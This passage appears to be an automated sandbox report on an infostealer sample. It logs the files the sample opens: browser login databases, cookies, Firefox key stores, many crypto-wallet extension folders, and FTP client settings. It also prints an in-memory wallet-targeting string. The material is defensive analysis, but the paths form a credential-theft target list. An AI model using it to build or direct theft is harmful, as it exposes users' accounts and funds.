                  Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: 21AE.exe, 00000005.00000002.2691748524.0000000000818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
                  Source: 21AE.exe, 00000005.00000002.2691748524.0000000000846000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                  Source: 21AE.exe, 00000005.00000002.2691748524.0000000000846000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                  Source: 21AE.exe, 00000005.00000002.2691748524.0000000000846000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                  Source: 21AE.exe, 00000005.00000002.2691748524.0000000000846000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                  Source: 21AE.exe, 00000005.00000003.2493723508.000000000088F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                  Source: 21AE.exe, 00000005.00000003.2493723508.000000000088F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: \\config\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeDirectory queried: C:\Users\user\Documents\KLIZUSIQENJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: Yara matchFile source: Process Memory Space: 21AE.exe PID: 5640, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: katA304.tmp PID: 1436, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara match; File source: 0000000C.00000002.2640862661.00000000042D9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: Process Memory Space: 21AE.exe PID: 5640, type: MEMORYSTR
                  Source: Yara match; File source: sslproxydump.pcap, type: PCAP
                  Source: Yara match; File source: 00000004.00000002.2290056275.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
